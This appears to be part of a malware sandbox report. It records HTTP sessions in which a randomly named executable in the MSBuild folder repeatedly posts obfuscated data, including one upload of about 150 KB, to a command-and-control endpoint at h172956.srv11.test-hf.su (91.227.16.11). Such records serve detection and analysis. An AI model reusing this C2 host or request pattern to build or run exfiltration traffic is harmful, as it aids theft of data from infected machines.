                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:44.610304117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:44.610636950 CET | 2548 | OUT | Data Raw: 51 5a 54 5d 5b 5a 50 54 5e 57 5a 51 57 5b 50 58 54 56 54 52 56 58 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QZT][ZPT^WZQW[PXTVTRVXWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:8)$0=]'_,6Y3'Y10V5'6,$$;&/&,%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:44.985385895 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                      10 | 192.168.2.4 | 49750 | 91.227.16.11 | 80
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:45.461106062 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:45.802882910 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      11 | 192.168.2.4 | 49751 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:45.811775923 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1868
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:46.155237913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:46.155657053 CET | 1868 | OUT | Data Raw: 54 50 54 5c 5e 5c 55 50 5e 57 5a 51 57 5b 50 52 54 54 54 5e 56 5e 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPT\^\UP^WZQW[PRTTT^V^WXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/!"S'#1_$>_;Y>^&(X29,U!?4T5&77]&:;9%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:46.527968884 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 11 31 3b 27 57 23 0a 3c 53 3e 2d 31 06 29 21 25 00 28 16 3d 14 3e 06 3d 04 2c 2a 2c 56 3f 5e 34 1c 20 2f 20 1a 21 22 3c 55 26 39 20 5c 05 11 24 02 24 0b 2e 02 27 04 21 5a 27 21 32 07 25 11 09 0b 2a 2b 31 03 33 07 38 05 23 0a 24 1f 26 2a 2b 5a 30 3f 36 04 2e 07 2f 1c 31 17 2d 54 02 17 21 0d 25 2e 3f 05 2b 30 23 58 26 0b 29 5c 2a 3d 3f 0f 22 07 3c 1d 36 33 25 59 25 28 36 59 21 22 23 59 3c 01 23 59 33 02 2c 53 26 04 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.1;'W#<S>-1)!%(=>=,*,V?^4 / !"<U&9 \$$.'!Z'!2%*+138#$&*+Z0?6./1-T!%.?+0#X&)\*=?"<63%Y%(6Y!"#Y<#Y3,S&#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      12 | 192.168.2.4 | 49752 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:45.946743965 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:46.287347078 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:46.287606001 CET | 2548 | OUT | Data Raw: 51 59 54 5c 5b 56 55 57 5e 57 5a 51 57 5c 50 53 54 53 54 5d 56 5e 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT\[VUW^WZQW\PSTST]V^W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C;-'U=\':\/?5$(/%9+#?(W!,'7#Y%<"-)%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:46.656646967 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.4 | 49753 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:47.157840014 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:47.499793053 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:47.500258923 CET2548OUTData Raw: 54 51 51 5d 5b 57 55 53 5e 57 5a 51 57 5c 50 5e 54 50 54 58 56 59 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ][WUS^WZQW\P^TPTXVYWYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;":'U!$&9;&;#X1'5</!,0B42?9,%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:47.870523930 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      14 | 192.168.2.4 | 49754 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:48.380800009 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:48.723937035 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:48.724226952 CET2548OUTData Raw: 54 5f 51 5c 5b 5b 55 56 5e 57 5a 51 57 5d 50 5b 54 56 54 5b 56 5c 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_Q\[[UV^WZQW]P[TVT[V\WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E.!50#1$5-,*^3(':35Z?!?($47$/>\,)%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:49.095474005 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      15 | 192.168.2.4 | 49755 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:49.577935934 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:49.933944941 CET2548OUTData Raw: 51 5b 51 5c 5e 5b 55 52 5e 57 5a 51 57 5e 50 58 54 51 54 5c 56 59 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[Q\^[UR^WZQW^PXTQT\VYW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E;1336-?)3Z&* !,5?^$;%<),%Z"!Q*
                                                                                      Mar 6, 2024 09:52:49.937273979 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:50.306214094 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:50 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      16 | 192.168.2.4 | 49757 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:50.570000887 CET394OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimU
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 153534
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:50.914952040 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:50.915596008 CET12860OUTData Raw: 2d 2d 2d 2d 2d 2d 31 67 48 62 52 39 53 65 45 39 56 54 61 42 69 6a 7a 71 62 6e 45 32 66 63 7a 57 68 46 34 42 56 69 6d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                      Data Ascii: ------1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimUContent-Disposition: form-data; name="0"Content-Type: text/plainTZQY[^U]^WZQWXPRTWTYV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S]
                                                                                      Mar 6, 2024 09:52:52.331410885 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      17 | 192.168.2.4 | 49758 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:50.706254005 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:51.049701929 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:51.050121069 CET2548OUTData Raw: 51 59 54 5c 5b 5e 55 50 5e 57 5a 51 57 50 50 53 54 5c 54 5e 56 54 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT\[^UP^WZQWPPST\T^VTWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/!.S$>'6/,6\319V5?<W"Z+^0<%,&-9%Z"!Q*
                                                                                      Mar 6, 2024 09:52:51.420874119 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:51 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      18 | 192.168.2.4 | 49759 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:51.892765999 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:52.235548973 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:52.235788107 CET1872OUTData Raw: 54 5f 51 5c 5b 5f 55 54 5e 57 5a 51 57 5f 50 59 54 5d 54 5b 56 5c 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_Q\[_UT^WZQW_PYT]T[V\W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C/-331$"_,';&)" Q540$$2%-9%Z"!Q*1
                                                                                      Mar 6, 2024 09:52:52.605741024 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 5d 25 15 0e 0c 22 30 3c 50 29 3e 26 5a 29 08 2e 5b 3c 06 03 5d 3d 2f 21 00 2c 00 2f 0f 3f 28 37 40 23 2f 2c 51 22 31 3c 55 32 03 20 5c 05 11 27 10 30 1c 21 58 27 14 2d 5a 30 32 2d 5b 26 11 2c 1c 2b 15 08 5c 27 3a 2b 1e 37 30 24 57 25 5c 33 5a 24 01 0f 59 2e 07 2f 1c 25 07 2d 54 02 17 21 0f 33 13 30 12 3f 0e 27 5a 31 31 39 14 3e 13 33 0d 35 39 2c 1d 21 33 0f 1f 31 38 07 05 36 0c 23 59 2b 3b 28 00 27 12 27 09 32 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.]%"0<P)>&Z).[<]=/!,/?(7@#/,Q"1<U2 \'0!X'-Z02-[&,+\':+70$W%\3Z$Y./%-T!30?'Z119>359,!3186#Y+;(''2.#U",R?\W0
                                                                                      Mar 6, 2024 09:52:52.606162071 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:52.949280977 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:52.949697018 CET2548OUTData Raw: 54 58 54 58 5b 5a 50 57 5e 57 5a 51 57 50 50 5d 54 5d 54 53 56 5e 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXTX[ZPW^WZQWPP]T]TSV^WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;.$U)06*]/X0''9(#<<!/34+&,);9%Z"!Q*
                                                                                      Mar 6, 2024 09:52:53.321913004 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:53 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      19 | 192.168.2.4 | 49760 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:53.806761026 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:54.153132915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:54.293247938 CET | 2548 | OUT | Data Raw: 54 5d 54 5c 5e 5a 50 53 5e 57 5a 51 57 5c 50 5e 54 50 54 5b 56 54 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]T\^ZPS^WZQW\P^TPT[VTWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B8)%#)Z06.^8/)&(;Z%)T!(U"Z#X0'7]&:X,%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:54.666429043 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      20 | 192.168.2.4 | 49761 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
